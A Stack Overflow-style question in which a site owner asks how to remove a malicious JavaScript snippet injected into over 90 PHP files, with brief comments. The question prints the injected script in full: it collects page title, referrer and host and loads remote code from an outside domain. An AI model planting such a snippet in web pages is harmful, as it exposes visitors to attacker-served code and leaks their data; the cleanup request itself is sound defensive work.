# locate all php files and replace them with space

Tags: php, regex

I'd like to find all `.php` files on server that contains this string (its bad script string i'm trying to replace, since it got embedded in my files ) :

```
<script>
    var a=''; 
    setTimeout(10); 
    var default_keyword = encodeURIComponent(document.title); 
    var se_referrer = encodeURIComponent(document.referrer); 
    var host = encodeURIComponent(window.location.host); 
    var base = "http://bobreknakliturkiye.com/js/jquery.min.php"; 
    var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); 

    if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '')
        {document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}

</script>
```

Since this string contains some escape characters i was having problems with putting it into `sed` .
Example: `find /home/www -type f -print0 | xargs -0 sed -i s/'<script>[^)]*<\/script>'/'<script>Stuff To Replace With<\/script>'/g`
 and that is not complete.

Other option might be :

- locate all bad `.php` files and save them in lets say `bad.txt` file
  so file would look like:

./path1_to_first_bad_file/bad1.php

./path2_to_first_bad_file/bad2.php

- use `bash` or `php` script to load that file like `readfile`, and find each one and replace with some pattern (blank space or something).

My question is, how can i do this ?

Thanks,
Michael

Comment: I'd use a text editor for that. Of course I use Windows, so I use TextPad.

Comment: I'd use source control for that. Of course, it doesn't matter what operating system I use :^)

Comment: there are over 90 files that have that code. i'd like to avoid opening them all one-by-one in editor :( That's why i was thinking about some pattern, script to find/replace it or save paths

Comment: Do you see any pattern? E.g. is `http://bobreknakliturkiye.com/js/jquery.min.php";` in every file?

Comment: @Jan yes. there is a pattern. It's in every file and on same line. over 90 files.